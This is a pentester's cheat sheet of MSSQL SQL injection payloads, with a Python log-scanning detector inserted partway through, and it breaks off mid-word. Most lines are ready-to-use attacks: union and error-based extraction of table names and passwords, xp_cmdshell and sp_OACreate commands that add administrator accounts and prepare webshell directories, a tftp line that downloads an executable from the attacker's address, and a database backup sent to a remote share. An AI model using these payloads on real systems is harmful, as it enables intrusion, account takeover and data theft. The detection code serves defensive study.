By: F19ht
I wrote this short article as a summary of some ideas gathered during penetration testing.
SQL injection began with the classic ' or '1'='1 tautology.
The most important system tables:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
The most important user and role names (present by default in a SQL Server database):
public
dbo
guest (generally disabled or not granted permissions)
db_securityadmin
db_ddladmin
Some default extended stored procedures:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia: drives
xp_dirtree: directory tree
xp_enumdsn: ODBC connections
xp_loginconfig: server security mode information
xp_makecab: creates a compressed archive
xp_ntsec_enumdomains: domain information
xp_terminate_process: terminates a process, given its PID
For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * from test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
' group by users.id having 1=1--
' group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values (666, 'attacker', 'foobar', 0xffff)--
' union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'--
' union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME not in ('login_id')--
' union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME not in ('login_id', 'login_name')--
' union select TOP 1 login_name FROM logintable--
' union select TOP 1 password FROM logintable where login_name='rahul'--
Constructed statements (for example, to check whether xp_cmdshell exists):
' union select @@version, 1, 1--
and 1=(select @@version)
and 'sa'=(select system_user)
' union select ret, 1, 1 from foo--
' union select min(username), 1, 1 from users where username > 'a'--
' union select min(username), 1, 1 from users where username > 'admin'--
' union select password, 1, 1 from users where username='admin'--
and user_name()='dbo'
and 0<>(select user_name())--
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user admin 123456 /add'
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='X'%20and%20name='xp_cmdshell')
and 1=(select is_srvrolemember('sysadmin')) determines whether the connection has sa (sysadmin) privileges
and 0<>(select top 1 paths from newtable)-- brute-force the database
and 1=(select name from master.dbo.sysdatabases where dbid=7) gets a database name (dbid 1 to 5 are the system databases; 6 and above can be enumerated)
Create a virtual directory for the E drive:
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e","e:\"'
Set the access permissions (then write a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit further dbid values (..., 9, ...) to get more database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') brute-forces a table name; assume it is admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('admin')) gets the other tables
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) brute-forces the object id; assume the value obtained is 18779569 (uid = id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) gets a column of admin; assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...)) exposes the other columns
and 0<(select user_id from bbs.dbo.admin where username>1) gets the user name
The password can be obtained the same way. This assumes that columns such as user_id, username and password exist.
show.asp?id=-1 union select 1,2,4,5,6,7,8,9,10,11,12,13,* from admin
show.asp?id=-1 union select 1,2,4,5,6,7,8,*,9,10,11,12,13 from admin
(Union statements work everywhere, and they are useful against Access as well.)
Special trick for brute-forcing the database: %5c (= '\'), or submit /AND/ modified as %5
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) determines the id value
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794) all columns
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass] [char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
; create table newtable (id int identity(500), paths varchar()) declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test output insert into newtable (paths) values (@test)
http://61.131.96.39/PageShow.asp?TianName=Policy and Regulation&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
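As an added defensive example (not part of the original post), the Python below does what a log reviewer needs against the request forms above: it URL-decodes the query string (including the %20 and double-encoded variants), strips inline comments, and flags the payload families this page lists (system-table enumeration, union probes, is_srvrolemember checks, stacked exec/declare, xp_cmdshell, sp_OACreate). The signature set and the W3C-style log lines are constructed for illustration, not a complete WAF rule set.

```python
import re
from urllib.parse import unquote_plus

# Payload families from the cheat sheet above, as regexes over a normalized query string (hypothetical rule set).
SIGNATURES = {
    "tautology":      r"'\s*or\s*'1'\s*=\s*'1",
    "schema_enum":    r"\b(sysobjects|syscolumns|sysdatabases|sysxlogins|information_schema\.columns)\b",
    "union_probe":    r"\bunion\s+(all\s+)?select\b",
    "srvrole_check":  r"\bis_srvrolemember\s*\(",
    "stacked_exec":   r";\s*(exec|declare|create\s+table|backup\s+database)\b",
    "xp_cmdshell":    r"\bxp_cmdshell\b",
    "ole_automation": r"\bsp_oa(create|method)\b",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SIGNATURES.items()}

def normalize(s, max_rounds=3):
    """Undo (possibly repeated) URL encoding, drop /* */ comments, collapse whitespace."""
    for _ in range(max_rounds):          # "%2520" needs two rounds to become a space
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).lower()

def classify(query_string):
    """Sorted signature families that match one decoded query string."""
    norm = normalize(query_string)
    return sorted(name for name, rx in COMPILED.items() if rx.search(norm))

# Constructed W3C-style IIS lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    "2024-05-01 10:00:01 10.0.0.5 GET /show.asp id=1 200",
    "2024-05-01 10:00:02 10.0.0.9 GET /show.asp id=1%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin')) 500",
    "2024-05-01 10:00:03 10.0.0.9 GET /show.asp id=-1%20union%20select%201,2,*%20from%20admin 200",
    "2024-05-01 10:00:04 10.0.0.9 GET /111.asp id=3400;exec%20master..xp_cmdshell%20'dir'-- 500",
    "2024-05-01 10:00:05 10.0.0.7 GET /PageShow.asp InfoID=1;use%2520master;declare%2520@s%2520int;exec%2520sp_oacreate%2520%22wscript.shell%22,@s%2520out;-- 500",
]

def scan_log(lines):
    """(client ip, uri stem, families) for every request matching a signature."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) >= 7:             # skip malformed lines instead of crashing
            hits = classify(fields[5])
            if hits:
                findings.append((fields[2], fields[4], hits))
    return findings
```

Run scan_log(SAMPLE_LOG) to see which constructed requests are flagged and under which families; the benign first line produces no finding.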
The following shows the web path d:\xxxx:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
The traditional test process with xp_cmdshell:
; exec master..xp_cmdshell 'dir'
; exec master.dbo.sp_addlogin hax;--
; exec master.dbo.sp_password null, hax, hax;--
; exec master.dbo.sp_addsrvrolemember hax, sysadmin;--
; exec master.dbo.xp_cmdshell 'net user admin 123456 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http://www.xxx.com/list.asp?classid=1; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user admin 123456 /add'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators admin /add'
http://localhost/show.asp?id=1; exec master..xp_cmdshell 'tftp -i yourip get file.exe'--
declare @a sysname set @a='xp_'+'your shell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
; declare @a sysname; set @a=db_name(); backup database @a to disk='\\your IP address\your shared directory\bak.dat'
If it is restricted, you can.
Se